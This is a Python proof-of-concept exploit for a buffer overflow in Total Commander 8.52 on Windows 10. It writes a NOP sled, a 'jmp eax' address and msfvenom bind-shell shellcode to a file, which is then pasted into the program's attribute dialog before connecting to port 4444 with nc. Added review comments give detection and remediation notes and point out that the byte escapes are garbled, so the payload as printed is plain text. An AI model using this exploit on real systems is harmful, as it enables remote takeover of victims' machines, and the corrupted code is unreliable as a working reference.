Total Commander 8.52 Buffer Overflow (Windows 10)
Posted on 22 September 2015
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
#
# Review notes (defensive reading of this public 2015 PoC):
# - The script itself performs no network I/O and touches no other process;
#   its only effect is to write one string to ./time.txt in the current
#   working directory. The overflow is only triggered by the manual paste
#   into the "Change Attributes" time field (Step 6).
# - The payload layout, per the author's comment below, is: NOP sled,
#   4-byte "jmp eax" return address, second sled, msfvenom bind-shell stub,
#   short trailing sled. A length limit on that time field that rejects
#   input of this size (several hundred characters) would presumably reject
#   this input; upgrading past 8.52 is the real remediation.
# - Per Step 7 the stub is windows/shell_bind_tcp on port 4444, so the
#   observable artifact on a compromised host is the Total Commander process
#   unexpectedly listening on TCP 4444 -- a useful detection hook.
# - NOTE(review): in this rendering the byte-escape sequences are not
#   intact -- as printed, "x90" is a three-character ASCII literal, not one
#   byte -- so the buffer written here is plain text rather than the byte
#   layout the comments describe.
# - Written for Python 2: a `str` is written to a handle opened with 'wb'.
#   Under Python 3 `file.write(buffer)` raises TypeError.
# - Style: `file` shadows the builtin of the same name, and the handle is
#   closed with an explicit close() instead of a `with` block.
file = open('time.txt' , 'wb');
# Sled + "jmp eax" address + second sled (see layout comment below).
buffer = "x90"*265 + "xfex24x76x6d" + "x90"*160
# 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b 'x00x0ax0d'
# Adjacent string literals inside the parentheses are concatenated by the
# parser into one payload string.
buffer += ("xdbxcbxd9x74x24xf4x5ax31xc9xbex97xf8xc7x9dxb1"
"x53x31x72x17x03x72x17x83x7dx04x25x68x7dx1dx28"
"x93x7dxdex4dx1dx98xefx4dx79xe9x40x7ex09xbfx6c"
"xf5x5fx2bxe6x7bx48x5cx4fx31xaex53x50x6ax92xf2"
"xd2x71xc7xd4xebxb9x1ax15x2bxa7xd7x47xe4xa3x4a"
"x77x81xfex56xfcxd9xefxdexe1xaax0excexb4xa1x48"
"xd0x37x65xe1x59x2fx6axccx10xc4x58xbaxa2x0cx91"
"x43x08x71x1dxb6x50xb6x9ax29x27xcexd8xd4x30x15"
"xa2x02xb4x8dx04xc0x6ex69xb4x05xe8xfaxbaxe2x7e"
"xa4xdexf5x53xdfxdbx7ex52x0fx6axc4x71x8bx36x9e"
"x18x8ax92x71x24xccx7cx2dx80x87x91x3axb9xcaxfd"
"x8fxf0xf4xfdx87x83x87xcfx08x38x0fx7cxc0xe6xc8"
"x83xfbx5fx46x7ax04xa0x4fxb9x50xf0xe7x68xd9x9b"
"xf7x95x0cx31xffx30xffx24x02x82xafxe8xacx6bxba"
"xe6x93x8cxc5x2cxbcx25x38xcfxd3xe9xb5x29xb9x01"
"x90xe2x55xe0xc7x3axc2x1bx22x13x64x53x24xa4x8b"
"x64x62x82x1bxefx61x16x3axf0xafx3ex2bx67x25xaf"
"x1ex19x3axfaxc8xbaxa9x61x08xb4xd1x3dx5fx91x24"
"x34x35x0fx1exeex2bxd2xc6xc9xefx09x3bxd7xeexdc"
"x07xf3xe0x18x87xbfx54xf5xdex69x02xb3x88xdbxfc"
"x6dx66xb2x68xebx44x05xeexf4x80xf3x0ex44x7dx42"
"x31x69xe9x42x4ax97x89xadx81x13xb9xe7x8bx32x52"
"xaex5ex07x3fx51xb5x44x46xd2x3fx35xbdxcax4ax30"
"xf9x4cxa7x48x92x38xc7xffx93x68")
# Trailing sled.
buffer += "x90" *10
# Write the assembled string and release the handle; no other side effects.
file.write(buffer)
file.close()